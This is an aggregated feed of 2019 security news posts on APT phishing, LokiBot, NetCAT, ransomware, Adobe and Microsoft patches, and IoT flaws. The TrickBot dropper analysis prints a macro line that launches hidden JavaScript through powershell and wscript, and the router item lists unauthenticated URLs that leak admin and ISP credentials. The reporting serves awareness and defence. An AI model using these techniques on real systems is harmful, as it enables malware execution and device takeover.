[Category: Breaking News, Security, Hacking, hacking news, information security news, Pierluigi Paganini, SAP September 2019 Security Patch Day, Security Affairs, Security News]

[*] [+] [-] [x] [A+] [a-]  
[l] at 9/12/19 3:27am
Iran-linked Cobalt Dickens APT group carried out a spear-phishing campaign aimed at tens of universities worldwide.

Researchers at Secureworks’ Counter Threat Unit (CTU) uncovered a phishing campaign carried out by the Iran-linked Cobalt Dickens APT group (also known as Silent Librarian) that targeted more than 60 universities four continents in July and August.

According to the experts, the attacks are part of a large campaign that hit at least 380 universities in more than 30 countries, in many cases the organizations have been hit multiple times.

“In July and August 2019, CTU researchers discovered a new large global phishing operation launched by COBALT DICKENS. This operation is similar to the threat group’s August 2018 campaign, using compromised university resources to send library-themed phishing emails.” reads the analysis published by Secureworks. “The messages contain links to spoofed login pages for resources associated with the targeted universities. Unlike previous campaigns that contained shortened links to obscure the attackers’ infrastructure, these messages contain the spoofed URL”

The universities hit by the hackers are in Australia, Canada, Hong Kong, the U.S., the U.K., and Switzerland. The experts have noticed that the APT group is using free online services as part of their operations, including certificates issued by the Let’s Encrypt  C A , domains, and publicly available tools.

The hackers registered at least 20 new domain names through the Freenom domain provider that offers free top-level domain names.

The hackers appear to be interested in getting access to the library, they sent phishing messages to people with access to the library of the targeted university. As usual, the messages urge the victims to do some specific actions, in this case, the attackers invite the victim to reactivate the account by following a spoofed link.

Unlike previous campaigns attributed at this APT group, this time the hackers used a spoofed link instead of relying on shortened URLs pointing to the fake login page.

The landing page appears to be identical or quite similar to the spoofed library resource.

Once the victims have provided their credentials, they are stored in a file named ‘pass.txt’ and the users are redirected to the genuine university website to avoid to raise suspicion.

“Metadata in other spoofed web pages supports the assessment that the threat actors are of Iranian origin. Specifically, a page copied on August 3 reveals an Iranian-related timestamp.” continues the report.

In August 2018, researchers at SecureWorks discovered another large phishing campaign targeting universities that was carried out by COBALT DICKENS.

Iranian hacking activity is intensifying in the last years, security firms uncovered the operations of many Iran-linked APT groups.

The US Department of Justice and Department of the Treasury in March 2018 announced charges against nine Iranians for alleged involvement in a massive state-sponsored hacking scheme, at the time the hackers hit more than 300 universities and tens of companies in the US and abroad and stole “valuable intellectual property and data.”

According to the Treasury Department, since 2013, the Mabna Institute hit 144 US universities and 176 universities in 21 foreign countries.

Geoffrey Berman, US Attorney for the Southern District of New York revealed that the spear phishing campaign targeted more than 100,000 university professors worldwide and about 8,000 accounts were compromised.

The Iranian hackers exfiltrated 31 terabytes, roughly 15 billion pages of academic projects were stolen.

The hackers also targeted the US Department of Labor, the US Federal Energy Regulatory Commission, and many private and non-governmental organizations.

The sanctions also hit the Mabna Institute, an Iran-based company, that had a critical role in coordinating the attacks on behalf of Iran’s Revolutionary Guards.

window._mNHandle = window._mNHandle || {}; window._mNHandle.queue = window._mNHandle.queue || []; medianet_versionId = "3121199"; try { window._mNHandle.queue.push(function () { window._mNDetails.loadTag("762221962", "300x250", "762221962"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – Cobalt Dickens, Iran APT)

The post Iran-linked group Cobalt Dickens hit over 60 universities worldwide appeared first on Security Affairs.

[Category: APT, Cyber warfare, Hacking, colbalt dickens, Cyberespionage, information security news, Iran, Pierluigi Paganini, Security Affairs, Security News]

[*] [-] [-] [x] [A+] [a-]  
[l] at 9/11/19 11:23pm
Security researchers at Fortinet uncovered a malspam campaign aimed distributing the LokiBot malware at a US manufacturing company.

FortiGuard SE Team experts uncovered a malspam campaign aimed distributing the LokiBot malware at a US manufacturing company.

The Lokibot malware has been active since 2015, it is an infostealer that was involved in many malspam campaigns aimed at harvest credentials from web browsers, email clients, admin tools and that was also used to target cryptocoin-wallet owners.

The original LokiBot malware was developed and sold by online by a hacker who goes online by the alias “lokistov,” (aka Carter).

The malicious code was initially advertised on many hacking forums for up to $300, later other threat actors started offering it for less than $80 in the cybercrime underground.

Now researchers spotted phishing messages targeting the employees of a large U.S. manufacturing company.

The Lokibot variant involved in the attack has been detected on August 21, and according to the researchers, it was compiled the same date.

“The FortiGuard Labs SE team identified a new malicious spam campaign on August 21 st ,, which we discovered after an analysis of information initially found on VirusTotal.” read the analysis of the experts. “It targeted a large US manufacturing company utilizing the well documented infostealer LokiBot. Interestingly enough, this also has a compilation date of August 21 st , which is the same day we discovered the malspam campaign.”

The phishing messages targeted the sales email address of the recipients, they emails were possibly sent from a compromised trusted sender having the IP address of 23 [ . ] 83 [ . ] 133 [ . ] 8. 

The messages are not written by native English speakers, they include attachments with names that attempt to trick victims into opening them with urgency ( “Please see ‘attache’”, which appears to be an “RFQ” or a “request for quotation.”)

The content of the spam messages encourages the victim to open the attachment as the senders’ colleague is currently out of office .

Once the victims have opened the compressed archive in the attachment, they will get infected with the LokiBot information stealer.

“LokiBot steals a variety of credentials – primarily FTP credentials, stored email passwords, passwords stored in the browser, as well as a whole host of other credentials,” continues the researchers. “ we will only highlight the unique characteristics observed in this specific sample. “

The sample involved in the spear-phishing campaign is disguised as a Dora The Explorer game executable.

The IP address used to deliver the phishing emails was observed by the experts in other similar attacks in the past, one of them targeting a German bakery with spam emails in Chinese on June 17.

“This particular IP address appears to have been used twice before in malicious spam attacks that occurred several months earlier, in June, attacking a large German Bakery in a malicious spam attack trying to lure a victim into downloading an electronic invoice.” states the researchers.

“Although the German Bakery attack email was in Chinese, as was the attachment – which was an RTF file which referenced a potentially compromised URL (deepaklab[.]com), that likely contained the malicious payload – the URL has been cleaned up and no longer serves up any content that we can analyze. It can be assumed that this may be another delivery mechanism for LokiBot, as it has been documented in the past utilizing RTF distribution vectors.

Experts pointed out that given the low volume of spam messages delivered using this newly identified relay, the server associated with this IP address is used by one group that leverages on it in very targeted attacks.

Unlike previous Lokibot variants, this particular sample did not use any steganography . 

More More details, including indicators of compromise (IOCs) are reported in the analysis published by Fortinet.

window._mNHandle = window._mNHandle || {}; window._mNHandle.queue = window._mNHandle.queue || []; medianet_versionId = "3121199"; try { window._mNHandle.queue.push(function () { window._mNDetails.loadTag("762221962", "300x250", "762221962"); }); } catch (error) {}

Pierluigi Paganini

( SecurityAffairs  – Lokibot, hacking)

The post LokiBot info stealer involved in a targeted attack on a US Company appeared first on Security Affairs.

[Category: Breaking News, Cyber Crime, Malware, hacking news, information security news, LokiBot, malware, phishing, Pierluigi Paganini, Security Affairs, Security News]

[*] [-] [-] [x] [A+] [a-]  
[l] at 9/11/19 4:02pm
Experts discovered a flaw dubbed NetCAT (Network Cache ATtack) that affects all Intel server-grade processors and allows to sniff sensitive data over the network.

Researchers from VUSec group at Vrije Universiteit Amsterdam have discovered a new vulnerability that can be exploited by a remote attacker to sniff sensitive details by mounting a side-channel attack over the network.

The weakness, tracked as CVE-2019-11184, resides in a performance optimization feature called Intel’s DDIO (Data-Direct I/O) that was implemented to grant network devices and other peripherals access to the CPU cache.

“With NetCAT, we show this threat extends to untrusted clients over the network, which can now leak sensitive data such as keystrokes in a SSH session from remote servers with no local access.” reads the analysis published by the researchers. “The root cause of the vulnerability is a recent Intel feature called DDIO, which grants network devices and other peripherals access to the CPU cache.”

An attacker controlling a machine on the target network can exploit the flaw to infer confidential data from an SSH session.

NetCAT

The experts explained that using a machine learning algorithm against the time information it is possible to perform a keystroke timing analysis to discover the words typed by a victim.

“In an interactive SSH session, every time you press a key, network packets are being directly transmitted. As a result, every time a victim you type a character inside an encrypted SSH session on your console, NetCAT can leak the timing of the event by leaking the arrival time of the corresponding network packet,” continues the experts.

“Now, humans have distinct typing patterns. For example, typing’s’ right after ‘a’ is faster than typing ‘g’ after’s.’ As a result, NetCAT can operate statical analysis of the inter-arrival timings of packets in what is known as a keystroke timing attack to leak what you type in your private SSH session.”

The researchers discovered that compared to a native local attacker, the NetCAT attack conducted by a remote attacker only reduces the accuracy of the discovered keystrokes on average by 11.7% by discovering inter-arrival of SSH packets with a true positive rate of 85%.

The following demo video published by the researchers shows how
spy i ng on SSH sessions in real-time leveraging a shared server.

Intel recommends users to either disable DDIO or at least RDMA to make it hard to carry out this attack. The chip vendor also suggested limiting direct access to the servers from untrusted networks.

Intel classified NetCAT as a partial information disclosure issue with “low” ( CVSS base score of 2.6 ). Intel awarded VUSec experts for the responsible disclosure.

Technical details of the research are reported in a paper published by the experts and titled “NetCAT: Practical Cache Attacks from the Network.”

window._mNHandle = window._mNHandle || {}; window._mNHandle.queue = window._mNHandle.queue || []; medianet_versionId = "3121199"; try { window._mNHandle.queue.push(function () { window._mNDetails.loadTag("762221962", "300x250", "762221962"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – NetCAT, hacking)

The post NetCAT attack allows hackers to steal sensitive data from Intel CPUs appeared first on Security Affairs.

[Category: Breaking News, Hacking, hacker news, information security news, Intel, NetCAT attack, Pierluigi Paganini, Security Affairs, Security News]

[*] [-] [-] [x] [A+] [a-]  
[l] at 9/11/19 7:44am
Another ransomware attack hits a school district, the victim is an institute in Connecticut that was targeted twice in only four months.

For the second time in just four months, another the Wolcott school district in Connecticut was a victim of a ransomware attack. Techers and students were not able to access the district’s internal email system following the infection.

“Students and teachers went back to school without access to computers or the district’s internal email system again Monday, five days after a second malware attack targeted the district’s servers.” states the Republican American. “Superintendent Anthony Gasper said teachers are being “flexible” and continue to teach their classes without computer access.”

The ransomware attack took place on Sept. 4 when a staff member reported suspicious activity on a district computer. The ransomware infected computers connected to the Wolcott school district networks, IT staff shut down them in response to the incident.

A precedent ransomware attack took place at the end of August and blocked the operations at all five Wolcott schools.

“The district was the victim of a three-month ransomware attackthis summer that blocked all five Wolcott schools from accessing internal files, as well as staff in the central office and business office.” reported the Associated Press.

According to the superintendent Anthony Gasper, all the computers are still turned off, except for a few computers that were set up for school secretaries.

The district has hired cyber security firm Kivu to help them in the incident response and recovering operations. Unfortunately, school districts are a privileged target for crooks, other ransomware attacks made the headlines recently.

Earlier in August, for the second time in a few days, Houston County Schools in Alabama delayed the school year’s opening due to a malware attack.

In the same period, several schools of Louisiana were also targeted by hackers ahead of  year’s beginning . The AP press reported that a fourth Louisiana school district, Tangipahoa Parish, is assessing damages caused by a  cyberattack  that its computer network.

window._mNHandle = window._mNHandle || {}; window._mNHandle.queue = window._mNHandle.queue || []; medianet_versionId = "3121199"; try { window._mNHandle.queue.push(function () { window._mNDetails.loadTag("762221962", "300x250", "762221962"); }); } catch (error) {}

Pierluigi Paganini

( SecurityAffairs  – ransomware attack, Wolcott)

The post The Wolcott school district suffered a second ransomware attack in 4 months appeared first on Security Affairs.

[Category: Breaking News, Cyber Crime, Malware, Cybercrime, hacker newa, hacker news, malware, Pierluigi Paganini, Security News, Wolcott schools]

[*] [-] [-] [x] [A+] [a-]  
[l] at 9/11/19 7:01am
Malware researc h ers at Yoroi -Cybaze analyzed the TrickBot dropper, a threat that has infected victims since 2016. Introduction

TrickBot it is one of the best known Banking Trojan which has been infecting victims since 2016, it is considered a cyber-crime tool. But nowadays defining it a “Banking Trojan” is quite reductive: during the last years its modularity brought the malware to a higher level. In fact it can be considered a sort of malicious implant able to not only commit bank-related crimes, but also providing tools and mechanism for advanced attackers to penetrate within company networks. For instance, it has been used by several gangs to inoculate Ryuk ransomware within the core servers infrastructure, leading to severe outages and business interruption (e.g. the Bonfiglioli case).

In this report, we analyzed one of the recently weaponized Word documents spread by TrickBot operators all around the globe. Revealing an interesting dropper composed by several thousand highly obfuscated Lines of Code and abusing the so-called ADS (Alternate Data Stream).

Technical Analysis Hash 07ba828eb42cfd83ea3667a5eac8f04b6d88c66e6473bcf1dba3c8bb13ad17d6 Threat Dropper Brief Description TrickBot document dropper Ssdeep 1536:KakJo2opCGqSW6zY2HRH2bUoHH4OcAPHy7ls4Zk+Q7PhLQOmB:3oo2hNx2Z2b9nJcAa7lsmg5LQOmB

Table 1. Sample’s information

Once opened, the analyzed Word document reveals its nature through an initial, trivial, trick. The attacker simply used a white font to hide the malicious content from the unaware user (and from the endpoint agents). Just changing the font foreground color unveils some dense JavaScript code. This is code will be executed in the next stages of the infection chain, but before digging the JavaScript code, we’ll explore the macro code embedded into the malicious document.

Figure 1. Content of Word document Figure 2. Unveiled content of Word document

The “Document_Open()” function (Figure 3) is automatically executed after the opening of the Word document. It retrieves the hidden document content through the “Print #StarOk, ActiveDocument.Content.Text” statement and writes a copy of it into the “%AppData%\Microsoft\Word\STARTUP\stati_stic.inf:com1” local file

Figure 3. Macro code embedded in the malicious document

Exploring the folder “\Word\STARTUP” we noticed the “stati_stic.inf” file counts zero bytes. Actually, the dropper abused an old Windows File System feature, known as “Alternate Data Stream” (ADS), to hide its functional data in an unconventional stream. A known techniques, T1096 on Mitre Att&ck framework, can be simply used by concatenating the colon operator and the stream name to the filename during any writing or reading operation. So, we extracted the content of the stream through a simple Powershell command.

Figure 4. Use of Alternate Data Stream to hide the payload

The extracted payload is the initial Word document hidden content. The malicious control flow resumes with the “Document_Close()” function, in which the “StripAllHidden()” function is invoked. This routine deletes all the hidden information embedded into the document by the attacker, probably with the intent to hide any traces unintentionally embedded during the development phase. Its code has probably been borrowed from some public snippets such as the one included at the link

After that, the macro code executes the data just written into the “com1” data stream. Since the stream contains JavaScript code, it will be executed through WScript utility using the following instructions:

  1. CallByName CreateObject(“wS” & Chri & “Ript.She” & Ja), “Run”, VbMethod, Right(Right(“WhiteGunPower”, 8), Rule) & “sHe” & Ja & ” wS” & Chri & “RipT” & GroundOn, 0

Which, after a little cleanup, becomes:

  1. CallByName CreateObject(“wScript.Shell”), “Run”, VbMethod, “powershell wscript /e:jscript “c:\users\admin\appdata\roaming\microsoft\word\startup\stati_stic.inf:com1””, 0
The JavaScript Dropper

Now, let’s take a look at the JavaScript code. It is heavily obfuscated and uses randomization techniques to rename variable names and some comments, along with chunks of junk instructions resulting in a potentially low detection rate.

Figure 5. Example of the sample detection rate

At first glance, the attacker purpose seems fulfilled. The script is not easily readable and appears extremely complex: almost 10 thousand lines of code and over 1800 anonymous function declared in the code.

Figure 6. Content of the JavaScript file

But after a deeper look, two key functions, named “jnabron00” and “jnabron”, emerge. These functions are used to obfuscated every comprehensible character of the script. The first one, “jnabron00”, is illustrated in the following figure: it returns always zero value.   

Figure 7. Function used to obfuscate the code

The other one, “jnabron”, is invoked with two parameters: an integer value (derived from some obfuscated operations) and a string which is always “Ch”.

  1. jnabron(102, ‘Ch’)

The purpose of this function is now easy to understand: it returns the ASCII character associated with the integer value through the “String.fromCharCode” JS function. Obviously, once again, to obfuscate the function internals the attacker included many junk instructions, as reported in Figure 9.

Figure 8. Another function used to obfuscate the code

Using a combination of the two functions, the script unpack its real instructions, causing a tedious work to the analyst who has to understand the malicious intents of the script. As shown in the following figure, tens of code lines result in a single instruction containing the real value will be included in the final script.

Figure 9. Example of de-obfuscation process

After a de-obfuscation phase, some useful values are visible, such as the C2 address, the execution of a POST request, and the presence of Base64-encoded data.

Figure 10. C2 checkin code

Analyzing this hidden control flow we discover the first action to be performed is the gathering of particular system information.  This is done through the WMI interface, specifying a particular WQL query and invoking the “ExecQuery” function to retrieve:

  • Info about Operating System
  • Info about machine
  • Info about current user
  • List of all active processes
Figure 11. Code used to extract information about system

These information are then sent to the command and control server during the check-in phase of the Javascript loader, along with the list of running processes.

Figure 12. Network traffic

Moreover, the script is able to gather a list of all files which have one of the extensions chosen by the attacker: PDF files, Office, Word and Excel documents. The result of this search is then written on a local file into the “%TEMP%” folder, and later uploaded to the attacker infrastructure.

Figure 13. Code to extract absolute paths from specific file types Conclusion

TrickBot is one of the most active Banking Trojan today, it is considered to be part of Cyber Crime arsenal and it is still under development. The malware, first appeared in 2016, during the last years adds functionalities and exploit capabilities such as  the infamous SMB Vulnerability (MS17-010) including EthernalBlueEthernalRomance or EthernalChampion.

The analyzed dropper contains a highly obfuscated JavaScript code counting about 10 thousand Lines of Code. This new infection chain structure represents an increased threat to companies and users, it can achieve low detection rates enabling the unnoticed delivery of TrickBot payload, which can be really dangerous for its victims: just a few days, or even a few hours in some cases, of active infection could be enough to propagate advanced ransomware attacks all across the company IT infrastructure. 

Technical details, including IoCs and Yara Rules, are available in the analysis published the Yoroi blog.

https://blog.yoroi.company/research/dissecting-the-10k-lines-of-the-new-trickbot-dropper/

window._mNHandle = window._mNHandle || {}; window._mNHandle.queue = window._mNHandle.queue || []; medianet_versionId = "3121199"; try { window._mNHandle.queue.push(function () { window._mNDetails.loadTag("762221962", "300x250", "762221962"); }); } catch (error) {}

Pierluigi Paganini

( SecurityAffairs  – Trickbot, malware)

The post Dissecting the 10k Lines of the new TrickBot Dropper appeared first on Security Affairs.

[Category: Breaking News, Malware, information security news, Pierluigi Paganini, Security Affairs, Security News, TrickBot]

[*] [-] [-] [x] [A+] [a-]  
[l] at 9/11/19 1:01am
Security experts have discovered that some models of D-Link and Comba WiFi routers leak their administrative login credentials in plaintext .

Security researchers from Trustwave’s SpiderLabs have discovered several credential leaking vulnerabilities in some models of D-Link and Comba Telecom.

The researcher Simon Kenin from SpiderLabs discovered five credential leaking vulnerabilities, three of them affect some Comba Telecom WiFi routers, the remaining impact a D-Link DSL modem.

An attacker could use these credentials to take over the routers and perform several malicious activities by changing device settings (i.e. change DNS settings to hijack the traffic, perform MitM attacks).

“There are five new credential leaking vulnerabilities discovered and disclosed by Simon Kenin. Two are in a D-Link DSL modem typically installed to connect a home network to an ISP.” reads the security advisory. “The other three are in multiple Comba Telecom WiFi devices. All the vulnerabilities involve insecure storage of credentials including three where cleartext credentials available to any user with network access to the device.”

In previous research, Kenin discovered similar flaws (CVE-2017-5521) in at tens of models of Netgear routers that were potentially affecting over one million Netgear customers.

While analyzing the dual-band D-Link DSL-2875AL wireless router, the expert discovered that a file located at https : //[router ip address ] /romfile.cfg contains the login password of the device in plaintext . Anyone with access to the web-based management IP address can read the files without any authentication. The expert confirmed that at least versions 1.00.01 & 1.00.05 are affected and likely models.

D-Link DSL-2875AL wireless router

The second flaw affects D-Link DSL-2875AL and the DSL-2877AL models. Analyzing the source code of the router login page (https://[router ip address]/index.asp) Kenin niticed the following lines:

var username_v = '<%TCWebApi_get("Wan_PVC","USERNAME","s")%>';
var password_v = '<%TCWebApi_get("Wan_PVC","PASSWORD","s")%>';

The devices are leaking the credentials for authenticating with the Internet Service Provider (ISP).

“The username & password listed there are used by the user to connect to his/her ISP. This could allow an attacker to access the ISP account or the router itself if they admins reused the same credentials.” continues the advisory.

Kenin reported the flaw to the vendor in early July, but D-Link released the fix on September 6.

The first of the three flaws affecting the Comba Wi-Fi Access Controllers impacts the Comba AC2400. The device leaks the MD5 hash of the device password by accessing the following URL without requiring any authentication.

https://[router ip address]/09/business/upgrade/upcfgAction.php?download=true

MD5 is known to be very easy to reverse, and the expert pointed out that if SSH/Telnet is enabled and attacker could take over the device.

The remaining two issues impact the Comba AP2600-I WiFi Access Point (version A02,0202N00PD2).

One of them causes the leak of MD5 hash of the device username and password through the source code of the web-based management login page, the second one the leak of credentials in plaintext stored in an SQLite database file located at:

 https  : //[router  ip  address ] / goform / downloadConfigFile .

The expert attempted to report the flaws to the vendor since February, but without success. The three flaws are unpatched at the time of writing.

“These types of router vulnerabilities are very serious. Since your router is the gateway in and out of your entire network it can potentially affect every user and system on that network. An attacker-controlled router can manipulate how your users resolve DNS hostnames to direct your users to malicious websites.” concludes the advisory. “An attacker-controlled router can deny access in and out of the network perhaps blocking your users from accessing important resources or blocking customers from accessing your website.”

window._mNHandle = window._mNHandle || {}; window._mNHandle.queue = window._mNHandle.queue || []; medianet_versionId = "3121199"; try { window._mNHandle.queue.push(function () { window._mNDetails.loadTag("762221962", "300x250", "762221962"); }); } catch (error) {}

Pierluigi Paganini

( SecurityAffairs  – D-Link, hacking)

The post Some models of Comba and D-Link WiFi routers leak admin credentials appeared first on Security Affairs.

[Category: Breaking News, Hacking, Internet of Things, D-Link router, hacking news, information security news, Pierluigi Paganini, Security Affairs, Security News]

[*] [-] [-] [x] [A+] [a-]  
[l] at 9/11/19 12:29am
Adobe September 2019 Patch Tuesday updates address two code execution bugs in Flash Player and a DLL hijacking flaw in Application Manager.

Adobe has released September 2019 Patch Tuesday updates that address two code execution vulnerabilities in Flash Player and a DLL hijacking flaw in Application Manager.

The two flaws addressed with the Flash Player 32.0.0.255 release are a use-after-free issue tracked as CVE-2019-8070, and a same-origin method execution flaw tracked as CVE-2019-8069. Adobe states that the flaws could be exploited by attackers for arbitrary code execution in the context of the targeted user.

“Adobe has released security updates for Adobe Flash Player for Windows, macOS , Linux and Chrome OS. These updates address critical vulnerabilities in Adobe Flash Player. Successful exploitation could lead to arbitrary code execution in the context of the current user.” reads the security advisory published by Adobe.

Both issued are rated as “critical” but Adobe researchers believe that their exploitation is hard and for this reason assigned them a priority rating of 2 (and 3 on Linux systems).

Adobe credited the expert Eduardo Braun Prado and a researcher who decided to remain anonymous for reporting the vulnerabilities.

Adobe also fixed a DLL hijacking vulnerability in the installer of the Application Manager that could be exploited to execute arbitrary code on the affected system. The vulnerability, tracked as CVE-2019-8076, was classified as “important” and received a priority rating of 3.

“Adobe has released a security update for the Adobe Application Manager installer for Windows. This update resolves an insecure library loading vulnerability in the installer that could lead to Arbitrary Code Execution.” reads the security advisory published by Adobe.

The flaw was reported by the security researcher Hamdi Maamri.

“This vulnerability exclusively impacts the installer used with the Adobe Application Manager. CVE-2019-8076 does not impact the existing Application Manager, and there is no action for customer running earlier versions,” continues the security advisory.

window._mNHandle = window._mNHandle || {}; window._mNHandle.queue = window._mNHandle.queue || []; medianet_versionId = "3121199"; try { window._mNHandle.queue.push(function () { window._mNDetails.loadTag("762221962", "300x250", "762221962"); }); } catch (error) {}

Pierluigi Paganini

( SecurityAffairs  – P atch Tuesday, hacking)

The post Adobe September 2019 Patch Tuesday updates fix 2 code execution flaws in Flash Player appeared first on Security Affairs.

[Category: Breaking News, Security, Adobe September 2019 Patch Tuesday, hacking news, information security news, Pierluigi Paganini, Security Affairs, Security News]

[*] [-] [-] [x] [A+] [a-]  
[l] at 9/11/19 12:05am
Microsoft Patch Tuesday updates for September 2019 address 80 flaws, including two privilege escalation issues exploited in attacks.

Microsoft Patch Tuesday security updates for September 2019 address 80 vulnerabilities, including two privilege escalation flaws that have been exploited in attacks in the wild.

The updates cover Microsoft Windows, Internet Explorer, Microsoft Edge, ChakraCore, Office and Microsoft Office Services and Web Apps, Skype for Business and Microsoft Lync, Visual Studio, .NET Framework, Exchange Server, Microsoft Yammer, and Team Foundation Server.

17 flaws are classified as Critical, 62 are listed as Important, and one is listed as Moderate in severity.

The first zero-day issue, tracked as CVE-2019-1214, resides in the Windows Common Log File System (CLFS) and could be exploited by an authenticated attacker with regular user privileges to escalate permissions to administrator .

The vulnerability affects all supported versions of Windows.

“An elevation of privilege vulnerability exists when the Windows Common Log File System (CLFS) driver improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context.” reads the security advisory published by Microsoft .

“To exploit the vulnerability, an attacker would first have to log on to the system, and then run a specially crafted application to take control over the affected system.”

Microsoft addresses the vulnerability by correcting how CLFS handles objects in memory.

“According to Microsoft, this CVE is only being seen targeting older operating systems. This is a fine time to remind you that Windows 7 is less than six months from end of support, which means you won’t be getting updates for bugs like this one next February.” states a post published by ZDI.

The flaw was reported by a researcher from the Qihoo 360 Vulcan Team.

The second zero-day vulnerability tracked as CVE-2019-1215 affects Winsock (ws2ifsl.sys) and could be exploited by a local authenticated attacker to execute code with elevated privileges.

“An elevation of privilege vulnerability exists in the way that ws2ifsl.sys (Winsock) handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated privileges.” reads the advisory.

“To exploit the vulnerability, a locally authenticated attacker could run a specially crafted application.”

Micr o soft addressed the vulnerability by ensuring that ws2ifsl.sys properly handles objects in memory.

Microsoft confirmed that this flaw has been already exploited by malware since 2017.

“Microsoft reports this is being actively used against both newer and older supported OSes, but they don’t indicate where. Interestingly, this file has been targeted by malware in the past, with some references going back as far as 2007.” reads the analysis published by the Zero Day Initiative. “Not surprising, since malware often targets low-level Windows services. Regardless, since this is being actively used, put this one on the top of your patch list.”

Microsoft also addressed two vulnerabilities that were publicly disclosed before fixes were made available, the CVE-2019-1235 and the CVE-2019-1294.

The first issue is a privilege escalation issue in the Windows Text Service Framework, the second one is a Windows Secure Boot bypass issue.

window._mNHandle = window._mNHandle || {}; window._mNHandle.queue = window._mNHandle.queue || []; medianet_versionId = "3121199"; try { window._mNHandle.queue.push(function () { window._mNDetails.loadTag("762221962", "300x250", "762221962"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – Microsoft Patch Tuesday, hacking)

The post Microsoft Patch Tuesday updates for September 2019 fix 2 privilege escalation flaws exploited in attacks appeared first on Security Affairs.

[Category: Breaking News, Security, information security news, Microsoft Patch Tuesday, Pierluigi Paganini, Security Affairs, Security News, zero-Day]

[*] [-] [-] [x] [A+] [a-]  
[l] at 9/10/19 10:27am
A security researcher disclosed zero-day flaws in Telestar Digital GmbH IoT radio devices that could be exploited by remote attackers to hijack systems without any user interaction.

The security researcher Benjamin Kunz from Vulnerability-Lab disclosed zero-day flaws in Telestar Digital GmbH IoT radio devices that could be exploited by remote attackers to hijack devices without any user interaction.

Telestar Digital GmbH IoT radio devices

The vulnerabilities have been tracked as CVE-2019-13473 and CVE-2019-13474

The issues were discovered several weeks ago when the company investigating an anomaly on a private network discovered the presence of the Telestar web radio terminals. The researchers discovered an undocumented telnetd server on the standard port 23, then, since port forwarding was activated for all ports on the network, the devices could be addressed from the outside.

“During the investigation of the security incident with our company, we noticed an undocumented Telnet service on the standard port 23 on the said end devices during a port scan. Since port forwarding was activated for all ports on this network, it could be addressed from the outside.” reads the report published by the experts. “Telnet services are less used today, because content is transmitted unencrypted and there are better alternatives today. Nevertheless, the protocol on network level and in end devices is still a bigger topic than originally thought.”

The IoT radio devices are manufactured by Imperial & Dabman (Series I and D) and are distributed in Germany by Telestar, but experts pointed out that it is possible to buy them via Ebay and Amazon by resellers. The devices have httpd web server , Web GUI, Wifi, or Bluetooth on board. The hardware of the terminals is equipped with Shenzen technology, while the firmware is based on BusyBox Linux Debian. 

Kunz and his colleagues were able to brute-force the IoT radio in just 10 minutes and achieve root access with full privileges. 

The researchers were able to edit some of the folders, created files, and modify paths to determine what it was possible to change in the native source of the application.

“Finally we was able to edit and access everything on the box and had the ability to fully compromise the smart web radio device. ” continues the experts.

The following video below shows how it is possible to compromise the radio devices. 

Attackers can perform a broad range of actions by exploiting the issues, including changing device names, setting boot-logo, setting volume, forcing a play stream , saving audio files as messages, transmit audio as commands both locally and remotely. 

According to Kunz, more than one million devices are potentially at risk, an attacker can trigger the flaws to build a huge botnet that could be used to launch powerful DDoS attacks.

The experts reported the vulnerabilities to Telestar Digital GmbH on June 1 and the company by August 30 released a fix to address the flaws.

The telnetd service is being deactivated and old and weak passwords are as well being removed or changed. Automatic updates are available via Wi-Fi and can be installed by setting IoT radio devices back to factory settings and downloading the latest firmware version. 

The good news is that Telestar Digital GmbH is not aware of attacks exploiting the vulnerabilities in the wild.

window._mNHandle = window._mNHandle || {}; window._mNHandle.queue = window._mNHandle.queue || []; medianet_versionId = "3121199"; try { window._mNHandle.queue.push(function () { window._mNDetails.loadTag("762221962", "300x250", "762221962"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – IoT radio devices, hacking)

 

The post Million of Telestar Digital GmbH IoT radio devices can be remotely hacked appeared first on Security Affairs.

[Category: Breaking News, Hacking, Internet of Things, hacking news, information security news, IoT, Pierluigi Paganini, Security Affairs, Security News, Telestar Digital GmbH IoT radio devices]

As of 9/15/19 10:01am. Last new 9/15/19 4:58am.

Next feed in category: Dark Reading